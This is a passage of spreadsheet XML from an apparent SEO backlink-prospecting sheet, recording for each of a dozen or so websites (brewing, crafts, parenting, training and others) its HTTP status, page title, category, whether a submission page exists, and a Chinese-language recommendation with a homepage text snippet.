      <x:c r="C168" s="19" t="str">
        <x:v>https://unknownbrewing.com</x:v>
      </x:c>
      <x:c r="D168" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E168" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F168" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G168" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H168" s="19" t="str">
        <x:v>https://www.unknownbrewing.com/</x:v>
      </x:c>
      <x:c r="I168" s="19" t="str">
        <x:v>Unknown Brewing - Learn About Beer</x:v>
      </x:c>
      <x:c r="J168" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K168" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L168" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M168" s="19" t="str">
        <x:v>https://www.unknownbrewing.com/</x:v>
      </x:c>
      <x:c r="N168" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O168" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P168" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q168" s="21" t="str">
        <x:v>The free resource makes learning about beer &amp; DIY Crafts. Unknown Brewing - Learn About Beer Skip to content Menu Menu Home Beer Style Guides Brewing Brewery Maker&amp;rsquo;s Corner Welcome to Unknown Brewing The free resource makes learning about beer &amp; DIY Crafts. Read The Latest Featured Articles Best Places to Eat After a Brewery Stop in Marathon, Florida Spending an afternoon brewery hopping in the Florida Keys usually leads to one thing pretty quickly hunger. Between salty air, strong sun, and a couple of cold pints, most people… 14 Best Breweries in Michigan 2025 Updated Do you live in Michigan, or are you planning to visit here? Do you also love drinking a nice cold beer and enjoying delicious meals and snacks? Look no further… 13 Best Breweri</x:v>
      </x:c>
      <x:c r="R168" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S168" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T168" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://unknownbrewing.com</x:v>
      </x:c>
    </x:row>
    <x:row r="169">
      <x:c r="A169" s="18" t="str">
        <x:v>168</x:v>
      </x:c>
      <x:c r="B169" s="19" t="str">
        <x:v>craftsy.life</x:v>
      </x:c>
      <x:c r="C169" s="19" t="str">
        <x:v>https://craftsy.life</x:v>
      </x:c>
      <x:c r="D169" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E169" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F169" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G169" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H169" s="19" t="str">
        <x:v>https://craftsy.life/</x:v>
      </x:c>
      <x:c r="I169" s="19" t="str">
        <x:v>Craftsy</x:v>
      </x:c>
      <x:c r="J169" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K169" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L169" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M169" s="19" t="str">
        <x:v>https://craftsy.life/</x:v>
      </x:c>
      <x:c r="N169" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O169" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P169" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q169" s="21" t="str">
        <x:v>In our blog you will find the most interesting crafts and tutorials about DIY, art, home decor, stylizations, and much more best ideas from blogs and experts all over the world. Craftsy Skip to content Home Crochet Amigurumi Privacy Policy About Us Craftsy is where anyone who loves to create or make things can be inspired, taught, or inspired in the craft community. Explore our site to get started today with free projects, patterns, and expert advice from some of the best in their fields. Here, we have the perfect how-tos for all skill levels in crafts, DIYs, crocheting, and many more. Follow these Curated collections; they will surely inspire you. Latest Post Amazing Crochet a Beautiful Ring Pattern for Eye-Catching Style Easy Crochet Little Flag Earrings Pattern for Everyday Cheer How to Crochet Snowflake Earrings Pattern for Winter Looks Quick &amp; Easy Crochet Clov</x:v>
      </x:c>
      <x:c r="R169" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S169" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T169" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://craftsy.life</x:v>
      </x:c>
    </x:row>
    <x:row r="170">
      <x:c r="A170" s="18" t="str">
        <x:v>169</x:v>
      </x:c>
      <x:c r="B170" s="19" t="str">
        <x:v>handsonaswegrow.com</x:v>
      </x:c>
      <x:c r="C170" s="19" t="str">
        <x:v>https://handsonaswegrow.com</x:v>
      </x:c>
      <x:c r="D170" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E170" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F170" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G170" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H170" s="19" t="str">
        <x:v>https://handsonaswegrow.com/</x:v>
      </x:c>
      <x:c r="I170" s="19" t="str">
        <x:v>Home - Hands On As We Grow®</x:v>
      </x:c>
      <x:c r="J170" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K170" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L170" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M170" s="19" t="str">
        <x:v>https://handsonaswegrow.com/</x:v>
      </x:c>
      <x:c r="N170" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O170" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P170" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q170" s="21" t="str">
        <x:v>Home - Hands On As We Grow® Skip to primary navigation Skip to main content Home Start Here About Hands On As We Grow® Hands on kids activities for hands on moms. Focusing on kids activities perfect for toddlers and preschoolers. Ready to have fun with your kids? GET SIMPLE ACTIVITIES TO DO WITH THEM! Hands on activities to do with your kids (1-3 year olds)"&gt; Toddler Activities (1-3 year olds) (3-5 year olds)"&gt; Preschooler Activities (3-5 year olds) Creative Art Projects Sensory Activities (Gross Motor Skills)"&gt; Get Moving Activities (Gross Motor Skills) (Fine Motor Skills)"&gt; Pre-Writing Activities (Fine Motor Skills) Hands-On Learning Activities Kid Crafts for Every Seasons Looking for some</x:v>
      </x:c>
      <x:c r="R170" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S170" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T170" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://handsonaswegrow.com</x:v>
      </x:c>
    </x:row>
    <x:row r="171">
      <x:c r="A171" s="18" t="str">
        <x:v>170</x:v>
      </x:c>
      <x:c r="B171" s="19" t="str">
        <x:v>coris-asset.com</x:v>
      </x:c>
      <x:c r="C171" s="19" t="str">
        <x:v>https://coris-asset.com</x:v>
      </x:c>
      <x:c r="D171" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E171" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F171" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G171" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H171" s="19" t="str">
        <x:v>https://coris-asset.com/</x:v>
      </x:c>
      <x:c r="I171" s="19" t="str">
        <x:v>Coris Asset Management</x:v>
      </x:c>
      <x:c r="J171" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K171" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L171" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M171" s="19" t="str">
        <x:v>https://coris-asset.com/</x:v>
      </x:c>
      <x:c r="N171" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O171" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P171" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q171" s="21" t="str">
        <x:v>Coris Asset Management Aller au contenu Accueil A propos Métiers Nos FCP FCP Coris Actions FCP Assurances FCP Coris Performance Contact FCP CORIS ACTIONS Un FCP (fonds commun de placement) orienté Actions qui investit majoritairement dans les actions des sociétés cotées à la BRVM. En savoir + FCP CORIS PERFORMANCE Un FCP (fonds commun de placement) diversifié qui investit dans les actions des sociétés cotées à la BRVM et dans les obligations En savoir + FCP ASSURANCES Un FCP (fonds commun de placement) qui investit principalement dans des instruments de créances à court terme. En savoir + Coris Asset Management 2013. AMF-UMOA et OPCVM tout simplement, Coris Asset Management est une société d</x:v>
      </x:c>
      <x:c r="R171" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S171" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T171" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://coris-asset.com</x:v>
      </x:c>
    </x:row>
    <x:row r="172">
      <x:c r="A172" s="18" t="str">
        <x:v>171</x:v>
      </x:c>
      <x:c r="B172" s="19" t="str">
        <x:v>twinkl.com.pe</x:v>
      </x:c>
      <x:c r="C172" s="19" t="str">
        <x:v>https://twinkl.com.pe</x:v>
      </x:c>
      <x:c r="D172" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E172" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F172" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G172" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H172" s="19" t="str">
        <x:v>https://www.twinkl.com.pe/</x:v>
      </x:c>
      <x:c r="I172" s="19" t="str"/>
      <x:c r="J172" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K172" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L172" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M172" s="19" t="str">
        <x:v>https://www.twinkl.com.pe/</x:v>
      </x:c>
      <x:c r="N172" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O172" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P172" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q172" s="21" t="str"/>
      <x:c r="R172" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S172" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T172" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.pe</x:v>
      </x:c>
    </x:row>
    <x:row r="173">
      <x:c r="A173" s="18" t="str">
        <x:v>172</x:v>
      </x:c>
      <x:c r="B173" s="19" t="str">
        <x:v>masterinsure.com.br</x:v>
      </x:c>
      <x:c r="C173" s="19" t="str">
        <x:v>https://masterinsure.com.br</x:v>
      </x:c>
      <x:c r="D173" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E173" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F173" s="20"/>
      <x:c r="G173" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H173" s="19" t="str"/>
      <x:c r="I173" s="19" t="str"/>
      <x:c r="J173" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K173" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L173" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M173" s="19" t="str">
        <x:v>https://masterinsure.com.br</x:v>
      </x:c>
      <x:c r="N173" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O173" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P173" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q173" s="21" t="str"/>
      <x:c r="R173" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S173" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T173" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://masterinsure.com.br
http://masterinsure.com.br</x:v>
      </x:c>
    </x:row>
    <x:row r="174">
      <x:c r="A174" s="18" t="str">
        <x:v>173</x:v>
      </x:c>
      <x:c r="B174" s="19" t="str">
        <x:v>vnnergy.com</x:v>
      </x:c>
      <x:c r="C174" s="19" t="str">
        <x:v>https://vnnergy.com</x:v>
      </x:c>
      <x:c r="D174" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E174" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F174" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G174" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H174" s="19" t="str">
        <x:v>https://vnnergy.com/</x:v>
      </x:c>
      <x:c r="I174" s="19" t="str">
        <x:v>The best training destination! | Vnnergy</x:v>
      </x:c>
      <x:c r="J174" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K174" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L174" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M174" s="19" t="str">
        <x:v>https://vnnergy.com/</x:v>
      </x:c>
      <x:c r="N174" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O174" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P174" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q174" s="21" t="str">
        <x:v>The best training destination! | Vnnergy All Categories Machine Learning Data Science Cloud Computing Agile and DevOps Project Management App Development Quality Management Online Marketing Sign Up Log in Login Existing Member Remember me Forgot Your Password? Register Now I agree with terms &amp; conditions Forgot Your password? Back to Login. Train to win with Vnnergy's corporate programs Contact us The Vnnergy advantage Vnnergy provides corporate training in emerging technologies like IT, Project Management, Artificial Intelligence, Robotics, Data Science, and more. With our classroom and online training solutions, we help companies and teams get the skills they need to succeed in the digital</x:v>
      </x:c>
      <x:c r="R174" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S174" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T174" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://vnnergy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="175">
      <x:c r="A175" s="18" t="str">
        <x:v>174</x:v>
      </x:c>
      <x:c r="B175" s="19" t="str">
        <x:v>lovemum.blog</x:v>
      </x:c>
      <x:c r="C175" s="19" t="str">
        <x:v>https://lovemum.blog</x:v>
      </x:c>
      <x:c r="D175" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E175" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F175" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G175" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H175" s="19" t="str">
        <x:v>https://lovemum.blog/</x:v>
      </x:c>
      <x:c r="I175" s="19" t="str">
        <x:v>Love, Mum - Tips and encouragement for getting the most out of family life.</x:v>
      </x:c>
      <x:c r="J175" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K175" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L175" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M175" s="19" t="str">
        <x:v>https://lovemum.blog/</x:v>
      </x:c>
      <x:c r="N175" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O175" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P175" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q175" s="21" t="str">
        <x:v>Tips and encouragement for getting the most out of family life. Love, Mum - Tips and encouragement for getting the most out of family life. Home About Positive Parenting Read Eat Play Love Contact Popular on the blog Recommended Book Series’ for Six to Eight-year-old Girls 7 Healthy Recipes for Using Up Weetbix Crumbs Early Chapter Book Series for Five to Seven-Year-Olds Your Last Day of Preschool Recent Posts How to Guide Your Child Through Disappointment Parenting | A Tough Gig Parenting Without a Degree: How I Found My Way with Expert Help Books We’re Reading this Week #4 admin / February 11, 2026 How to Guide Your Child Through Disappointment I recently watched a short clip from an interview with Bear Grylls where he spoke about building our inner mu</x:v>
      </x:c>
      <x:c r="R175" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S175" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T175" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://lovemum.blog</x:v>
      </x:c>
    </x:row>
    <x:row r="176">
      <x:c r="A176" s="18" t="str">
        <x:v>175</x:v>
      </x:c>
      <x:c r="B176" s="19" t="str">
        <x:v>tebdiy.com</x:v>
      </x:c>
      <x:c r="C176" s="19" t="str">
        <x:v>https://tebdiy.com</x:v>
      </x:c>
      <x:c r="D176" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E176" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F176" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G176" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H176" s="19" t="str">
        <x:v>https://tebdiy.com/</x:v>
      </x:c>
      <x:c r="I176" s="19" t="str">
        <x:v>Teb DIY</x:v>
      </x:c>
      <x:c r="J176" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K176" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L176" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M176" s="19" t="str">
        <x:v>https://tebdiy.com/</x:v>
      </x:c>
      <x:c r="N176" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O176" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P176" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q176" s="21" t="str">
        <x:v>Here at TEBDIY.com, we'll provide you with an extensive range of garden ideas, interior design ideas, home decor ideas, and many other ideas related to your house and furniture. Teb DIY Skip to primary navigation Skip to main content DIY Crochet Patterns Knit Patterns Decor Ideas DIY Crafts search... search... DIY Crochet Patterns Knit Patterns DIY Crafts × Here at TEBDIY.com, we’ll provide you with an extensive range of garden ideas, interior design ideas, home decor ideas, and many other ideas related to your house and furniture. With expert tutorials, inspiring how-to projects, and a love for crafty, we are passionate about helping you tackle the job in the DIY world, whatever it may be. Free Crochet Fingerless Glove Pattern for Warm Hands Headband Free Crochet Pattern for Stylish Accessories Free Crochet Pattern: Lavender Keychain with Floral Style Easy Free Cro</x:v>
      </x:c>
      <x:c r="R176" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S176" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T176" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://tebdiy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="177">
      <x:c r="A177" s="18" t="str">
        <x:v>176</x:v>
      </x:c>
      <x:c r="B177" s="19" t="str">
        <x:v>homeharmonynow.org</x:v>
      </x:c>
      <x:c r="C177" s="19" t="str">
        <x:v>https://homeharmonynow.org</x:v>
      </x:c>
      <x:c r="D177" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E177" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F177" s="20"/>
      <x:c r="G177" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H177" s="19" t="str"/>
      <x:c r="I177" s="19" t="str"/>
      <x:c r="J177" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K177" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L177" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M177" s="19" t="str">
        <x:v>https://homeharmonynow.org</x:v>
      </x:c>
      <x:c r="N177" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O177" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P177" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q177" s="21" t="str"/>
      <x:c r="R177" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S177" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T177" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://homeharmonynow.org
http://homeharmonynow.org</x:v>
      </x:c>
    </x:row>
    <x:row r="178">
      <x:c r="A178" s="18" t="str">
        <x:v>177</x:v>
      </x:c>
      <x:c r="B178" s="19" t="str">
        <x:v>pcdn.co</x:v>
      </x:c>
      <x:c r="C178" s="19" t="str">
        <x:v>https://pcdn.co</x:v>
      </x:c>
      <x:c r="D178" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E178" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F178" s="20"/>
      <x:c r="G178" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H178" s="19" t="str"/>
      <x:c r="I178" s="19" t="str"/>
      <x:c r="J178" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K178" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L178" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M178" s="19" t="str">
        <x:v>https://pcdn.co</x:v>
      </x:c>
      <x:c r="N178" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O178" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P178" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q178" s="21" t="str"/>
      <x:c r="R178" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S178" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T178" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://pcdn.co
http://pcdn.co</x:v>
      </x:c>
    </x:row>
    <x:row r="179">
      <x:c r="A179" s="18" t="str">
        <x:v>178</x:v>
      </x:c>
      <x:c r="B179" s="19" t="str">
        <x:v>thelovedchild.net</x:v>
      </x:c>
      <x:c r="C179" s="19" t="str">
        <x:v>https://thelovedchild.net</x:v>
      </x:c>
      <x:c r="D179" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E179" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F179" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G179" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H179" s="19" t="str">
        <x:v>https://thelovedchild.net/</x:v>
      </x:c>
      <x:c r="I179" s="19" t="str">
        <x:v>Parenting Workshops | Parenting Classes in MA | TLC Family Center</x:v>
      </x:c>
      <x:c r="J179" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K179" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L179" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M179" s="19" t="str">
        <x:v>https://thelovedchild.net/</x:v>
      </x:c>
      <x:c r="N179" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O179" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P179" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q179" s="21" t="str">
        <x:v>The Loved Child Family Center, in Belmont, MA, offers parenting workshops, classes &amp; support groups for all types of families. Learn more today! Parenting Workshops | Parenting Classes in MA | TLC Family Center About TLC About Us Our Partners Testimonials TLC Photo Gallery Our Policies Gift Cards Parents Prenatal Education Infants &amp; Babies (0-12 Months) Toddlers &amp; Preschoolers (12-48 months) Elementary, Tweens &amp; Teens (5-18 years) Organizations Parenting Support for Business Employees Parenting Programs for Nonprofit &amp; Educational Institutions One-On-One Support Prenatal Support Breastfeeding Support Sleep Support Child Development &amp; Behavior Blog Contact Us About TLC About Us Our Partners Testimonials TLC Photo Gallery Our Policies Gift Cards Parents Prenatal Education Infants &amp; Babies (0-12 Months) Toddlers &amp; Preschoolers (12-48 mo</x:v>
      </x:c>
      <x:c r="R179" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S179" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T179" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thelovedchild.net</x:v>
      </x:c>
    </x:row>
    <x:row r="180">
      <x:c r="A180" s="18" t="str">
        <x:v>179</x:v>
      </x:c>
      <x:c r="B180" s="19" t="str">
        <x:v>kprz.com</x:v>
      </x:c>
      <x:c r="C180" s="19" t="str">
        <x:v>https://kprz.com</x:v>
      </x:c>
      <x:c r="D180" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E180" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F180" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G180" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H180" s="19" t="str">
        <x:v>https://kprz.com/</x:v>
      </x:c>
      <x:c r="I180" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J180" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K180" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L180" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M180" s="19" t="str">
        <x:v>https://kprz.com/</x:v>
      </x:c>
      <x:c r="N180" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O180" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P180" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q180" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access kprz.com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a349b9504dbd8b8f &amp;bull; Your IP: Click to rev</x:v>
      </x:c>
      <x:c r="R180" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S180" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T180" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://kprz.com</x:v>
      </x:c>
    </x:row>
    <x:row r="181">
      <x:c r="A181" s="18" t="str">
        <x:v>180</x:v>
      </x:c>
      <x:c r="B181" s="19" t="str">
        <x:v>cmpusa.org</x:v>
      </x:c>
      <x:c r="C181" s="19" t="str">
        <x:v>https://cmpusa.org</x:v>
      </x:c>
      <x:c r="D181" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E181" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F181" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G181" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H181" s="19" t="str">
        <x:v>https://www.cmpusa.org/</x:v>
      </x:c>
      <x:c r="I181" s="19" t="str">
        <x:v>Community Military Partnership – Home of Easy360 and American News Network</x:v>
      </x:c>
      <x:c r="J181" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K181" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L181" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M181" s="19" t="str">
        <x:v>https://www.cmpusa.org/</x:v>
      </x:c>
      <x:c r="N181" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
